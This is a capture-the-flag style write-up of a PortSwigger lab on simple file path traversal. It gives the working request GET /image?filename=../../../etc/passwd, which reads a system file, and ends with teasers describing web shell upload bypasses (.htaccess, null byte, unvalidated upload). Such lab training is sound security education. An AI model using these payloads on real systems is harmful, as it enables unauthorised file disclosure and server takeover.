On this page
File Path Traversal: Simple Case
Lab
File path traversal, simple case · Apprentice
Solution
Given
This lab contains a path traversal vulnerability in the display of product images.
To solve the lab, retrieve the contents of the /etc/passwd file.
Analysis
Somewhere on the site there's a path traversal vulnerability in product image display. We need to read the /etc/passwd file using it.
Recon
We look at the site, paying attention to image-loading requests. We set up a filter to show such requests. We see the request:
GET /image?filename=60.jpg
We send it to Repeater and try path traversal.
First we try ../../etc/passwd — "No such file".
Final payload
GET /image?filename=../../../etc/passwd HTTP/2
Lab solved!
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.